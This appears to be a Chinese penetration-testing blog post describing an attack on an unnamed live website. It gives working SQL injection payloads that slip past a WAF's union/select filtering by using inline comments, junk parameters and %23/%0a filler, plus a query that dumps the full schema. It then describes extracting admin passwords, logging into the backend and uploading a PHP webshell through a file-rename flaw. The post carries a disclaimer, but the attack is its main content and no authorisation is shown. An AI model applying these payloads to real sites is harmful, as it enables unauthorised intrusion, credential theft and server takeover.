实战绕过某WAF+拿shell组合拳

语言: CN / TW / HK

声明: 该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

文章来源:奇安信攻防社区(ruirui)

原文地址: https://forum.butian.net/share/994

0x01 注入环节

目标加单引号报错,然后加闭合-- -返回正常,确认存在注入

OK,第一步判断注入完成,然后我们order by 查看有多少个字段

发现链接被重置某不知名WAF,我们这里第一手先尝试一手内联注入看是否能绕过order by检测

测试发现内联确实能绕过order by 的检测,payload

/!order/ /!by/ 10-- -

/!order/ /!by/ 18,18报错,17正常回显,这里确定有17个字段,然后我们进行union select

经测试发现内联无法绕过union select,这个站强制拦截 union 和 select关键字

这里发现就算把union注释了也会被拦截

这个确实是比较麻烦,他强制拦截这两个关键字,给我们注入带来了非常多的麻烦,然后这里经过我的测试构造出了一种办法来绕过他这个WAF的限制

第一种办法利用 and mod(35,12) 取基数和偶数的办法来让WAF的拦截变弱,然后再加上脏数据绕过

现在我们来复现第一种办法绕过此WAF

这里发现构造 and mod 还是会被拦截,然后我们这里继续构造一波垃圾参数加 and mod 来绕过他对union的拦截强度

什么是垃圾参数呢?这里给大家讲一下当我们在url中输入: http://www.0day.team//index.php?s=a select ,那么页面会显示危险请求,但是当我们输入 http://www.0day.team//index.php?aaa=a select 页面则不作任何响应。

因为服务器端的脚本并没有接收aaa参数他认为我们的语句已经被注释掉了,所以会给我们放行,而实际上a、aaa都是垃圾参数并没有被我们的动态脚本所处理,所以也不会影响程序功能

现在我们来实际操作一波这个拦截力度比较强的WAF

这样去构造垃圾参数可以看到页面是正常访问的,然后我们在 id=10 哪里正常输入我们的sql语句就行了

payload:

detail.php?asdasdasdasd/*&id=10' and mod (35,12) union &asdasdas=1*/

这里可以发现已经不拦截union了,可是这里比较鸡肋,你把union和select连起来他会进行拦截,这时候我们用构造脏数据的方法来进行绕过他的连接限制。

利用%23注释在里面添加脏数据,然后利用%0a进行换行操作,这样就可以成功绕过他这个WAF了

payload:

detail.php?asdasdasdasd/*&id=10' and mod (35,12) union%23aasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdas%0aselect &asdasdas=1*/

可以发现现在已经成功的绕过了union select,OK,现在我们来继续操作

成功的到回显位6

payload:

detail.php?asdasdasdasd/*&id=.10' and mod (35,12) union%23aasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdas%0aselect 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -&asdasdas=1*/

OK,然后我们继续来操作 database() 获取当前数据库

可以发现数据库已经出来,然后我们现在在来获取表

现在可以发现表名已经出来了,还发现一个事情就是这个WAF好像只拦截union和select关键字,这两个关键字有点难绕,其他的都不拦截。

可惜可惜,不然还可以在操作一波,然后回到正题,我们可以发现这个表实在是太多了,我懒的一个一个找,我这里直接构造一个爆表爆列的dios进行注入就行了

payload:

detail.php?asdasdasdasd/*&id=.10' and mod (35,12) union%23aasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdas%0aselect 1,2,3,4,5,concat((select @rui from(select (@rui:=0x00),(select @rui from information_schema.columns where table_schema=database() and @rui in(@rui:=concat(@rui,table_name,0x2d2d3e,column_name,0x3c62723e))))rui)),7,8,9,10,11,12,13,14,15,16,17-- -&asdasdas=1*/

这个是dios的效果,然后我们这里直接搜索password关键字,拿到后台账号密码就行了

已经找到了目标后台的账号密码表和列接下来直接注数据就行了

可以看到所有的管理员用户密码我们已经拿到了,接下来就进入找后台和拿shell环节

谷歌语法搜索发现目标管理后台,接下来我们进行登录尝试

利用刚才注入出来的数据成功登录到了目标后台

0x02 拿shell环节

接下来我们寻找上传点拿下目标shell

这一处发现利用burp抓包修改jpg后辍能导致任意上传,下面我们来实战进行测试

上传成功后发现php里面的内容被强制转换成图片了,这里发现比较鸡肋就没有跟深一步研究,然后开始重新找其他上传点

然后发现档案管理这里可以任意改文件名,我在这里上传了一个图片格式的一句话,然后改后缀为php,成功拿下目标shell

蚁剑链接图

本文作者:潇湘信安